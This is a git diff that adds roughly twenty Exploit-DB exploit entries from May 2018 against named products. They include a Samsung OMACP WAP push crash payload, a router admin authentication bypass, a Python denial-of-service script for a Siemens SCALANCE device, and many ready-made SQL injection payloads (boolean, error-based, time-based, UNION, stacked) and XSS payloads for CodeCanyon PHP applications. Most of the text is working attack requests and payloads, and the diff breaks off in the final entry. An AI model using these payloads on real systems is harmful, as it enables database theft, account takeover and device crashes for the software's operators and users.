diff --git a/exploits/android/dos/44724.txt b/exploits/android/dos/44724.txt new file mode 100644 index 000000000..0741f1d66 --- /dev/null +++ b/exploits/android/dos/44724.txt @@ -0,0 +1,29 @@ +OMACP is a protocol supported by many mobile devices which allows them to receive provisioning information over the mobile network. One way to provision a device is via a WAP push SMS message containing provisioning information in WbXML. + +A malformed OMACP WAP push message can cause memory corruption on a Samsung S7 Edge device when processing the String Extension portion of the WbXml payload. This is due to an integer overflow in memory allocation for this string. + +While OMACP WAP pushes require authentication, the entire WbXml payload of a push is parsed to extract the credentials, so this bug occurs pre-authentication. + +To reproduce the issue: + +1) install the attached Android application on a different phone than the one being tested for the issue +2) manually give the application SMS permissions in the settings screen +3) start the app and enter the phone number on the target device +4) press the "send wap push" button + +The target phone will crash: + +02-20 15:52:56.952 15197 15197 F DEBUG : pid: 15180, tid: 15196, name: IntentService[S >>> com.wsomacp <<< +02-20 15:52:56.952 15197 15197 F DEBUG : signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x731a800000 + +The WAP payload causing this problem is: + +690b6d0733b401506694f4c6504cf6be7224df6199a9c0ec4b76db1f6e262c457fc0553dbb50863dfce2d5c55077c3ffffffff7f777777770A0604B6B6B6B6. + +Code for the test app is also attached. + +This was tested on Samsung build number NRD90M.G93FXXU1DQJ8, which is the most recent update on my device + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44724.zip \ No newline at end of file diff --git a/exploits/hardware/webapps/44736.txt b/exploits/hardware/webapps/44736.txt new file mode 100644 index 000000000..ae0d3dd63 --- /dev/null +++ b/exploits/hardware/webapps/44736.txt @@ -0,0 +1,40 @@ +# Exploit Title: SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change +# Shodan Dork: SDT-CW3B1 +# Date: 2018-05-23 +# Exploit Author: Safak Aslan +# Vendor Homepage: http://telesquare.co.kr/ +# Version: SKT CW3B1 sw version 1.2.0 +# Tested on: Windows +# CVE: - + +# Class: Unauthorized Admin Credential Change +# Impact: The attacker can access, change and remove admin's credential and sensitive data of the device. +# Remotely Exploitable: Yes +# Authentication Required: No + +# Vulnerability Description + +/admin/management.shtml --> System Management access without authentication + +# Using the directory of /admin/management.shtml, it is possible to access directly System Management without authentication. +# The attacker has a right to change User ID, +# Password for General User, User ID, and Password for Admin. + +# Proof-of-Concept + +http://targetIP/admin/management.shtml + + +# Additional Info + +Additionally, the attacker can reach without authorization the below directories. +/admin/upload_firmware.shtml (Router firmware and lte firmware upgrade) +/internet/wan.shtml (WAN settings info leak) +/index.html (Version and status info leak) +/nas/ftpsrv.shtml (The settings of FTP) +/wifi2g/basic.shtml (The settings of Wireless) +/admin/status.shtml (The leak information of access point status) +/internet/lan.shtml (The leak information of LAN settings) +/admin/statistic.shtml (System statistics info leak) +/serial/serial_direct.shtml (The settings of direct serial) +/admin/upload_firmware.shtml (Router Firmware and LTE Firmware upgrade) \ No newline at end of file diff --git a/exploits/linux/dos/44721.py b/exploits/linux/dos/44721.py new file mode 100755 index 000000000..0de3152b3 --- /dev/null +++ b/exploits/linux/dos/44721.py @@ -0,0 +1,16 @@ + # Exploit Title: Siemens SCALANCE S613 - Remote Denial of Service +# Date: 2018-05-23 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: https://www.siemens.com/ +# Version: SCALANCE S613 (MLFB: 6GK5613-0BA00-2AA3): All versions. +# Tested on: Kali Linux +# CVE: CVE-2016-3963 + +#!/usr/bin/python + +import socket import sys if len(sys.argv) < 2: print('Usage: ' + +sys.argv[0] + ' [target]') sys.exit(1) print('Sending packet to ' + +sys.argv[1] + ' ...') payload = bytearray('11 49 00 00 00 00 00 00 00 00 00 +00 00 00 00 00 28 9E'.replace(' ', '').decode('hex')) sock = +socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.sendto(payload, +(sys.argv[1], 5000000)) \ No newline at end of file diff --git a/exploits/linux/webapps/44734.txt b/exploits/linux/webapps/44734.txt new file mode 100644 index 000000000..65a5513bc --- /dev/null +++ b/exploits/linux/webapps/44734.txt @@ -0,0 +1,31 @@ +# Exploit Title: Honeywell Scada System - Information Disclosure +# Date: 2018-05-23 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: https://www.honeywell.com +# Version: WebVersion : 3.2.1.294365 - DeviceType : IPC-HFW2320R-ZS +# Tested on: Linux + +# To be written after the destination IP address /web_caps/webCapsConfig +# the downloaded file opens with the file name. The file contains +# critical information about the destination address + +https://TargetIp/web_caps/webCapsConfig + +# Result: + +"Anonymous" : false, + "DeviceSubClass" : "Unknown", + "HttpPort" : { + "InnerPort" : 80 + }, + "HttpsPort" : { + "InnerPort" : 443 + }, + "NAS_Protocol_Mask" : 100, + "PluginVersion" : "3.3.37.274972", + "TCPPort" : 37777, + "WebVersion" : "3.2.1.294365", + "deviceType" : "IPC-HFW2320R-ZS", + "eth0" : { + "IPAddress" : "36.67.33.226", + "IPv6Address" : "2001:250:3000:1::1:2" \ No newline at end of file diff --git a/exploits/php/webapps/44706.txt b/exploits/php/webapps/44706.txt new file mode 100644 index 000000000..c6ceedbcc --- /dev/null +++ b/exploits/php/webapps/44706.txt @@ -0,0 +1,42 @@ +# Exploit Title: EasyService Billing 1.0 - 'template_().php' SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: +https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : all of the print and preview pages have the same vulnerabilities. (template_SBilling.php, template_Receipt.php, template_SBillingPerforma.php,template_SBillingQuotation.php) + All of them use the same parameters. An attacker can use any of these. +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=145 + Payload : tid=3&id=145' OR NOT 3938=3938# + + Type : error-based + Demo : +http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=145 + Payload : tid=3&id=145' AND (SELECT 7524 FROM(SELECT +COUNT(*),CONCAT(0x7162707671,(SELECT +(ELT(7524=7524,1))),0x71767a7171,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UjGj + + Type : AND/OR time-based blind + Demo : +http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=145 + Payload : tid=3&id=145' AND SLEEP(5)-- USaG + + +==================================================== +# PoC : XSS : + + Payload : +http://test.com/EasyServiceBilling/print/template_SBilling.php?tid=3&id=' +‘; \ No newline at end of file diff --git a/exploits/php/webapps/44707.txt b/exploits/php/webapps/44707.txt new file mode 100644 index 000000000..35a184761 --- /dev/null +++ b/exploits/php/webapps/44707.txt @@ -0,0 +1,49 @@ +# Exploit Title: EasyService Billing 1.0 - 'customer-new-s.php' SQL +Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : all of the print and preview pages have the same vulnerabilities. (template_SBilling.php, template_Receipt.php, template_SBillingPerforma.php,template_SBillingQuotation.php) + All of them use the same parameters. An attacker can use any of these. +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney + Payload : Payload: p1=akkus+keyney' AND 1815=1815 AND 'izgU'='izgU + + Type : error-based + Demo : +http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney + Payload : p1=akkus+keyney' AND (SELECT 2882 FROM(SELECT +COUNT(*),CONCAT(0x7162627171,(SELECT +(ELT(2882=2882,1))),0x717a6b6271,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UFGx'='UFGx + + Type : AND/OR time-based blind + Demo : +http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney + Payload : p1=akkus+keyney' AND SLEEP(5) AND 'TJOA'='TJOA + + Type : UNION query + Demo : +http://test.com/EasyServiceBilling/customer-new-s.php?p1=akkus+keyney + Payload : p1=akkus+keyney' UNION ALL SELECT +NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162627171,0x4e70435a69565a6248565947566b74614e7a5969635671587073454f75726f53795477506d514567,0x717a6b6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# + + + +==================================================== +# PoC : XSS : + + Payload : +http://test.com/EasyServiceBilling/customer-new-s.php?p1=' +‘; \ No newline at end of file diff --git a/exploits/php/webapps/44708.txt b/exploits/php/webapps/44708.txt new file mode 100644 index 000000000..a2d11679f --- /dev/null +++ b/exploits/php/webapps/44708.txt @@ -0,0 +1,43 @@ +# Exploit Title: MySQL Smart Reports 1.0 - SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/mysql-smart-reports-online-report-generator-with-existing-data/16836503 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : It is actually a post request sent by the user to update. + You do not need to use post data. You can injection like +GET method. +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 + Payload : add=true&id=9' RLIKE (SELECT (CASE WHEN (8956=8956) THEN 9 ELSE +0x28 END))-- YVFC + + Type : error-based + Demo : +http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 + Payload : add=true&id=9' AND (SELECT 3635 FROM(SELECT +COUNT(*),CONCAT(0x716a6a7671,(SELECT +(ELT(3635=3635,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HEMo + + Type : AND/OR time-based blind + Demo : +http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1 + Payload : add=true&id=9' AND SLEEP(5)-- mcFO + + +==================================================== +# PoC : XSS : + + Payload : +http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=' +‘; \ No newline at end of file diff --git a/exploits/php/webapps/44709.txt b/exploits/php/webapps/44709.txt new file mode 100644 index 000000000..716c9ea51 --- /dev/null +++ b/exploits/php/webapps/44709.txt @@ -0,0 +1,72 @@ +# Exploit Title: MySQL Blob Uploader 1.7 - 'download.php' SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 +# Version: 1.7 - seventh update +# Category: Webapps +# Tested on: Kali linux +==================================================== + +# PoC : SQLi : + +Parameter : id + +Type : boolean-based blind +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44' AND 4775=4775 AND 'yvnT'='yvnT&t=files + +Type : error-based +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44' AND (SELECT 7995 FROM(SELECT +COUNT(*),CONCAT(0x71766b7071,(SELECT +(ELT(7995=7995,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'VOHb'='VOHb&t=files + +Type : AND/OR time-based blind +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44' AND SLEEP(5) AND 'GnhY'='GnhY&t=files + +Type : UNION query +Demo : +http://test.com/EasyFileUploader/settings-users-edit.php?id=1 +Payload : id=-9508' UNION ALL SELECT +NULL,NULL,NULL,NULL,CONCAT(0x71766b7071,0x6267544b5552795353544744426577526b47544d477553476d576442544152546e4a456b586c726d,0x71786b7671),NULL-- +wxis&t=files + + + +Parameter : t + +Type : boolean-based blind +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44&t=files` WHERE 6575=6575 AND 6608=6608# + +Type : error-based +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44&t=files` WHERE 5293=5293 AND (SELECT 1625 FROM(SELECT +COUNT(*),CONCAT(0x71766b7071,(SELECT +(ELT(1625=1625,1))),0x71786b7671,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OpVv + +Type : AND/OR time-based blind +Demo : +http://test.com/MySqlBlobUploader/download.php?id=44&t=files +Payload : id=44&t=files` WHERE 6736=6736 AND (SELECT * FROM +(SELECT(SLEEP(5)))GjCP)-- UaZE + +==================================================== + +# PoC : XSS : + +Payload(1) : +http://test.com/MySqlBlobUploader/download.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98;&t=files + +Payload(2) : +http://test.com/MySqlBlobUploader/download.php?id=44&t=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98 +; \ No newline at end of file diff --git a/exploits/php/webapps/44710.txt b/exploits/php/webapps/44710.txt new file mode 100644 index 000000000..2e96e3856 --- /dev/null +++ b/exploits/php/webapps/44710.txt @@ -0,0 +1,46 @@ +# Exploit Title: MySQL Blob Uploader 1.7 - 'home-file-edit.php' SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 +# Version: 1.7 - seventh update +# Category: Webapps +# Tested on: Kali linux +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/MySqlBlobUploader/home-file-edit.php?id=42 + Payload : id=42' AND 5445=5445 AND 'xkCg'='xkCg + + Type : error-based + Demo : +http://test.com/MySqlBlobUploader/home-file-edit.php?id=42 + Payload : id=42' AND (SELECT 8740 FROM(SELECT +COUNT(*),CONCAT(0x7178717671,(SELECT +(ELT(8740=8740,1))),0x717a6b7171,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xWJA'='xWJA + + Type : AND/OR time-based blind + Demo : +http://test.com/MySqlBlobUploader/home-file-edit.php?id=42 + Payload : id=42' AND SLEEP(5) AND 'eOfO'='eOfO + + Type : UNION query + Demo : +http://test.com/MySqlBlobUploader/home-file-edit.php?id=42 + Payload : id=-4824' UNION ALL SELECT +CONCAT(0x7178717671,0x4e4448494b6a6457474572704c5a73534661474c6f6b44554a7863754d77565570654c664a634274,0x717a6b7171),NULL,NULL,NULL,NULL,NULL-- +aTGd + + +==================================================== + +# PoC : XSS : + + Payload : +http://test.com/MySqlBlobUploader/home-file-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98;&t=files \ No newline at end of file diff --git a/exploits/php/webapps/44711.txt b/exploits/php/webapps/44711.txt new file mode 100644 index 000000000..b344a7c9b --- /dev/null +++ b/exploits/php/webapps/44711.txt @@ -0,0 +1,47 @@ +# Exploit Title: MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 +# Version: 1.7 - seventh update +# Category: Webapps +# Tested on: Kali linux +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7 + Payload : id=7' AND 3132=3132 AND 'erLO'='erLO + + Type : error-based + Demo : +http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7 + Payload : id=7' AND (SELECT 6373 FROM(SELECT +COUNT(*),CONCAT(0x71717a6b71,(SELECT +(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JvQj'='JvQj + + Type : AND/OR time-based blind + Demo : +http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7 + Payload : id=7' AND SLEEP(5) AND 'MvuE'='MvuE + + Type : UNION query + Demo : +http://test.com/MySqlBlobUploader/home-filet-edit.php?id=7 + Payload : id=-3399' UNION ALL SELECT +CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL-- +EcgK + + +==================================================== + +# PoC : XSS : + + Payload : +http://test.com/MySqlBlobUploader/home-filet-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98 +; \ No newline at end of file diff --git a/exploits/php/webapps/44712.txt b/exploits/php/webapps/44712.txt new file mode 100644 index 000000000..409c78344 --- /dev/null +++ b/exploits/php/webapps/44712.txt @@ -0,0 +1,39 @@ +# Exploit Title: MySQL Blob Uploader 1.7 - 'home-filet-edit.php' SQL Injection +# Dork: N/A +# Date: 2018-05-22 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/mysql-file-and-image-uploader-and-sharing-blob-file-server/17748300 +# Version: 1.7 - seventh update +# Category: Webapps +# Tested on: Kali linux + +# PoC: SQLi: +# Parameter: id +# Type: boolean-based blind +# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7 +# Payload: + +id=7' AND 3132=3132 AND 'erLO'='erLO + +# Type: error-based +# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7 +# Payload: + +id=7' AND (SELECT 6373 FROM(SELECT +COUNT(*),CONCAT(0x71717a6b71,(SELECT +(ELT(6373=6373,1))),0x716b706a71,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'JvQj'='JvQj + +# Type: AND/OR time-based blind +# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7 +# Payload: + +id=7' AND SLEEP(5) AND 'MvuE'='MvuE + +# Type: UNION query +# Demo: http://Target/MySqlBlobUploader/home-filet-edit.php?id=7 +# Payload: + +id=-3399' UNION ALL SELECT +CONCAT(0x71717a6b71,0x6d54504e42544e4b6e6b7a6661595a6a73546d6d4563546554615368546a4a4e4e7a6d6279515672,0x716b706a71),NULL,NULL,NULL,NULL,NULL,NULL-- +EcgK \ No newline at end of file diff --git a/exploits/php/webapps/44714.txt b/exploits/php/webapps/44714.txt new file mode 100644 index 000000000..0f613f2b0 --- /dev/null +++ b/exploits/php/webapps/44714.txt @@ -0,0 +1,55 @@ +# Exploit Title: PHP Dashboards v4.5 - Registration Page SQL Injection +# Dork: N/A +# Date: 23.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/php-dashboards-v40-collaborative-social-dashboards/19314871 +# Version: v4.5 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +because it fails to sufficiently sanitize user-supplied data before using +it in an SQL query.Exploiting this issue could allow an attacker to +compromise the application, access or modify data, or exploit latent +vulnerabilities in the underlying database. +==================================================== + +# PoC : SQLi : + +http://test.com/php/save/user.php?mode=add + +POST /php/save/user.php?mode=add HTTP/1.1 +Host: phpdashboardv4.dataninja.biz +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://test.com/ +Content-Length: 156 +Cookie: PHPSESSID=kbnho15754hdrgf4aokv8c1a35 +Connection: keep-alive +email=test123%40gmail.com&password=test123&dashboardKey=&url= +phpdashboardv4.dataninja.biz +%2Fphp%2Fsave%2F%3Fmode%3Dcollaborate%26email%3Dtest123%40gmail.com + + + +Vulnerable Payload : + +Parameter: email (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: email=test123@gmail.com' AND 3667=3667 AND +'ksGc'='ksGc&password=test123&dashboardKey=&url= +test.com/php/save/?mode=collaborate%26email=test123@gmail.com + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: email=test123@gmail.com' AND SLEEP(5) AND +'iStK'='iStK&password=test123&dashboardKey=&url= +test.com/php/save/?mode=collaborate%26email=test123@gmail.com + + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44715.txt b/exploits/php/webapps/44715.txt new file mode 100644 index 000000000..88effd7c0 --- /dev/null +++ b/exploits/php/webapps/44715.txt @@ -0,0 +1,54 @@ +# Exploit Title: PHP Dashboards 4.5 - SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/php-dashboards-v50-brand-new-enterprise-edition/21540104 +# Version: v4.5 +# Category: Webapps +# Tested on: Kali linux +# Description: +# PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC: SQLi: + +http://Target/php/save/user.php?mode=add + +POST /php/save/user.php?mode=add HTTP/1.1 +Host: phpdashboardv5.dataninja.biz +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://phpdashboardv5.dataninja.biz/ +Content-Length: 152 +Cookie: PHPSESSID=f4ducgk49cgei129vs7qfl10g7 +Connection: keep-alive +email=test2%40gmail.com&password=test123&dashboardKey=&url= +phpdashboardv5.dataninja.biz +%2Fphp%2Fsave%2F%3Fmode%3Dcollaborate%26email%3Dtest2%40gmail.com + + +# Vulnerable Payload: +# Parameter: email (POST) +# Type: boolean-based blind +# Title: AND boolean-based blind - WHERE or HAVING clause +# Payload: + +email=test2@gmail.com' AND 6800=6800 AND +'fACB'='fACB&password=test123&dashboardKey=&url= +Target/php/save/?mode=collaborate%26email=test2@gmail.com + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind +# Payload: + +email=test2@gmail.com' AND SLEEP(5) AND +'zgpA'='zgpA&password=test123&dashboardKey=&url= +Target/php/save/?mode=collaborate%26email=test2@gmail.com \ No newline at end of file diff --git a/exploits/php/webapps/44716.txt b/exploits/php/webapps/44716.txt new file mode 100644 index 000000000..4f8716bfe --- /dev/null +++ b/exploits/php/webapps/44716.txt @@ -0,0 +1,24 @@ +# Exploit Title: Mcard - Mobile Card Selling Platform 1 - Cross-Site Request Forgery +# Date: 2018-05-23 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/mcard-mobile-card-selling-platform/19307193?s_rank=15 +# Version: 1 +# Tested on: Kali linux + +# POC : + + + + CSRF POC + + +
+ + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/44718.txt b/exploits/php/webapps/44718.txt new file mode 100644 index 000000000..71b5d0723 --- /dev/null +++ b/exploits/php/webapps/44718.txt @@ -0,0 +1,43 @@ +# Exploit Title: Gigs v2.0 - Login Page SQL Injection +# Dork: N/A +# Date: 23.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/gigs-services-marketplace/20716059 +# Version: v2.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +because it fails to sufficiently sanitize user-supplied data before using +it in an SQL query.Exploiting this issue could allow an attacker to +compromise the application, access or modify data, or exploit latent +vulnerabilities in the underlying database. +==================================================== + +# PoC : SQLi : + +https://test.com/thegigs/user/dashboard/is_valid_login + +POST /thegigs/user/dashboard/is_valid_login HTTP/1.1 +Host: dreamguys.co.in +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/javascript +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: https://test.com/thegigs/ +Content-Length: 27 +Cookie: ci_session=33p2j7q2a35qt5vrjt1r0985pt2i0v7g +Connection: keep-alive +username=demo&password=1234 + +Vulnerable Payload : + +Parameter: username (POST) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: username=demo' AND SLEEP(5) AND 'NVll'='NVll&password=1234 + + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44719.txt b/exploits/php/webapps/44719.txt new file mode 100644 index 000000000..58b64d864 --- /dev/null +++ b/exploits/php/webapps/44719.txt @@ -0,0 +1,51 @@ +# Exploit Title: Online Store System CMS 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor: Wecodex Solutions +# Vendor Homepage: https://www.wecodex.com/item/view/online-store-system-in-php-and-mysql/3 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description: PHP Dashboards is prone to an SQL-injection vulnerability +# because it fails to sufficiently sanitize user-supplied data before using +# it in an SQL query.Exploiting this issue could allow an attacker to +# compromise the application, access or modify data, or exploit latent +# vulnerabilities in the underlying database. + +# PoC: SQLi: +# Demo: https://Target/demos/shop/ + +https://Target/demos/shop/index.php?action=clientaccess + +POST /demos/shop/index.php?action=clientaccess HTTP/1.1 +Host: Target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://Target/demos/shop/index.php?view=clientaccess +Cookie: PHPSESSID=6fabn4skieu59mgjn63i4d38u0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 39 +email=admin%40admin.com&password=123456 + + +# Vulnerable Payload: +# Parameter: email (POST) +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: + +email=admin@admin.com" RLIKE (SELECT (CASE WHEN (7084=7084) +THEN 0x61646d696e4061646d696e2e636f6d ELSE 0x28 END)) AND +"eloY"="eloY&password=123456 + +# Type: AND/OR time-based blind +# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) +# Payload: + +email=admin@admin.com" AND (SELECT * FROM +(SELECT(SLEEP(5)))lzxm) AND "vZea"="vZea&password=123456 \ No newline at end of file diff --git a/exploits/php/webapps/44720.txt b/exploits/php/webapps/44720.txt new file mode 100644 index 000000000..3c75b27e4 --- /dev/null +++ b/exploits/php/webapps/44720.txt @@ -0,0 +1,56 @@ +# Exploit Title: GPSTracker v1.0 - Login Page SQL Injection +# Dork: N/A +# Date: 23.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://www.wecodex.com +# https://codecanyon.net/item/gpstracker-gps-trackgin-system/21873663 +# Version: 1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : PHP Dashboards is prone to an SQL-injection vulnerability +because it fails to sufficiently sanitize user-supplied data before using +it in an SQL query.Exploiting this issue could allow an attacker to +compromise the application, access or modify data, or exploit latent +vulnerabilities in the underlying database. + +==================================================== + +# PoC : SQLi : + + +http://test.com/fotracking/account/signin + +POST /fotracking/account/signin HTTP/1.1 +Host: 188.165.129.80 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://test.com/fotracking/login +Content-Length: 32 +Cookie: PHPSESSID=ikk8m7o6v54836u6a36sr6qko1 +Connection: keep-alive +id=democlient&password=test12345 + + +Vulnerable Payload : + +Parameter: id (POST) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: id=democlient' AND 8345=8345 AND +'jDLh'='jDLh&password=test12345 + + Type: stacked queries + Title: MySQL > 5.0.11 stacked queries (comment) + Payload: id=democlient';SELECT SLEEP(5)#&password=test12345 + + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: id=democlient' AND SLEEP(5) AND 'yGiF'='yGiF&password=test12345 + + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44722.txt b/exploits/php/webapps/44722.txt new file mode 100644 index 000000000..158898440 --- /dev/null +++ b/exploits/php/webapps/44722.txt @@ -0,0 +1,43 @@ +# Exploit Title: Shipping System CMS 1.0 - SQL Injection +# Dork: N/A +# Date: 2018-05-23 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor : Wecodex Solutions +# Vendor Homepage: https://www.wecodex.com/item/view/shipping-system-by-parcel-in-php-and-mysql/4 +# Version: 1.0 